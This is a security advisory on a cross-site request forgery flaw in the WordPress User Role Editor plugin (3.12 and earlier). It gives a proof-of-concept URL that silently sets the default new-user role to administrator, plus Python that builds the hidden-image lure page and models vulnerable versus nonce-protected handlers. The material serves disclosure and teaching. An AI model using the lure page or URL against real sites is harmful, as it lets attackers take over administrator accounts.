
WordPress Plugin User Role Editor 3.12 - Cross-Site Request Forgery

Author: Henry Hoggard
type: webapps
platform: php
port: 
date_added: 2013-05-26 
date_updated: 2013-05-26 
verified: 0 
codes: OSVDB-93699 
tags: WordPress Plugin
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: WP User Role Editor CSRF
# Date: 19/5/13
# Exploit Author: Henry Hoggard
# Author Website: http://henryhoggard.co.uk
# Vendor Homepage: https://wordpress.org/support/plugin/user-role-editor
# Software Link: https://wordpress.org/support/plugin/user-role-editor
# Version: <=3.12
# Tested on: Debian
# CVE : none yet

Notified Dev: 16/05/13
Patch Released (3.14): 17/05/13

Description:
The plugin's "default role for new users" action (action=default) is reachable
with a plain GET request and is not protected against cross-site request
forgery. If a logged-in administrator is lured onto an attacker-controlled page
that loads the URL below, the role assigned to newly registered users is
silently changed to administrator. The attacker then registers an ordinary
account (the site must allow registration) and receives administrator
privileges. The admin only has to visit the page; nothing is shown to them.

Proof of concept (request the victim administrator's browser must issue):

http://server/wordpress/wp-admin/users.php?page=user-role-editor.php&action=default&user_role=administrator
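
The following is an added example, not code from the advisory author or from the plugin. It builds the lure page that delivers the GET above, and models the vulnerable handler beside a nonce-protected one (the standard WordPress CSRF defence, what check_admin_referer() enforces) to show why the forged request succeeds against <=3.12 and fails once a per-user nonce is required. The handler names, the nonce action name, the nonce construction and the session store are assumptions made for the model; the advisory does not describe how 3.14 actually fixed the issue.

```python
"""
Model of the User Role Editor "default role" handler before and after a
nonce check, plus the lure page an attacker would host.  Added example;
handler names, nonce scheme and session store are assumptions, not the
plugin's real code.
"""
import hashlib
import hmac
import secrets
from html import escape
from urllib.parse import parse_qs, urlencode, urlparse

# Target taken from the advisory's proof-of-concept URL.
TARGET = "http://server/wordpress/wp-admin/users.php"
ATTACK_QUERY = {"page": "user-role-editor.php",
                "action": "default", "user_role": "administrator"}
NONCE_ACTION = "ure-default-role"   # assumed nonce action name for the model


def attack_url(base=TARGET, query=ATTACK_QUERY):
    return base + "?" + urlencode(query)


def lure_page(url):
    """HTML the attacker hosts.  Rendering it makes the victim's browser send a
    GET for `url` with the wp-admin session cookie attached (browsers of the
    time sent cookies on cross-site image loads; SameSite=Lax defaults now
    block this particular vector).  The response is never read, which does not
    matter: the side effect has already happened on the server."""
    return ('<html><body><img src="%s" width="1" height="1" alt=""></body></html>'
            % escape(url, quote=True))


class Site:
    """Minimal stand-in for a WordPress site: one admin session, one setting."""

    def __init__(self):
        self.default_role = "subscriber"
        self.secret = secrets.token_bytes(32)          # per-site salt (constructed)
        self.sessions = {"admin-cookie": {"user_id": 1, "caps": {"manage_options"}}}

    def make_nonce(self, user_id, action):
        # Bound to the user and the action so one nonce cannot be replayed for
        # another.  Simplified: real WP nonces also mix in a time tick and the
        # session token.
        msg = ("%s|%d" % (action, user_id)).encode()
        return hmac.new(self.secret, msg, hashlib.sha256).hexdigest()[:10]

    @staticmethod
    def _parse(url):
        return {k: v[0] for k, v in parse_qs(urlparse(url).query).items()}

    def handle_vulnerable(self, url, cookie):
        """<=3.12 behaviour as the advisory describes: only 'is the requester an
        admin?' is checked, which a forged request from the admin's own browser
        passes because the cookie rides along."""
        session = self.sessions.get(cookie)
        if not session or "manage_options" not in session["caps"]:
            return 403
        q = self._parse(url)
        if q.get("page") == "user-role-editor.php" and q.get("action") == "default":
            self.default_role = q.get("user_role", self.default_role)
            return 200
        return 404

    def handle_fixed(self, url, cookie):
        """Same handler with a nonce check.  The attacker's page cannot learn the
        nonce, so the forged request is rejected before the setting changes."""
        session = self.sessions.get(cookie)
        if not session or "manage_options" not in session["caps"]:
            return 403
        q = self._parse(url)
        if q.get("page") == "user-role-editor.php" and q.get("action") == "default":
            expected = self.make_nonce(session["user_id"], NONCE_ACTION)
            if not hmac.compare_digest(q.get("_wpnonce", ""), expected):
                return 403
            self.default_role = q.get("user_role", self.default_role)
            return 200
        return 404

    def register(self, username):
        """Open registration: a new account gets whatever the default role is."""
        return {"user": username, "role": self.default_role}


def run_attack(fixed):
    """Admin views the lure page, then the attacker registers.  Returns the
    status of the forged request and the role the attacker's account got."""
    site = Site()
    handler = site.handle_fixed if fixed else site.handle_vulnerable
    status = handler(attack_url(), "admin-cookie")      # browser-issued GET
    return status, site.register("attacker")["role"]


def legit_change(user_role="editor"):
    """The admin's own, nonce-bearing request still works on the fixed site."""
    site = Site()
    url = attack_url(query={**ATTACK_QUERY, "user_role": user_role,
                            "_wpnonce": site.make_nonce(1, NONCE_ACTION)})
    return site.handle_fixed(url, "admin-cookie"), site.default_role


if __name__ == "__main__":
    print(lure_page(attack_url()))
    print("vulnerable:", run_attack(False))   # (200, 'administrator')
    print("fixed:     ", run_attack(True))    # (403, 'subscriber')
```

The point the model makes: a capability check alone does not distinguish a request the admin meant to send from one their browser was tricked into sending, because both carry the same session cookie. A nonce tied to the user and action is something only a page served by the site itself can embed, so a cross-origin lure cannot supply it. When testing a plugin for this class of bug, look for state-changing admin actions that accept GET and succeed when `_wpnonce` is stripped from the request.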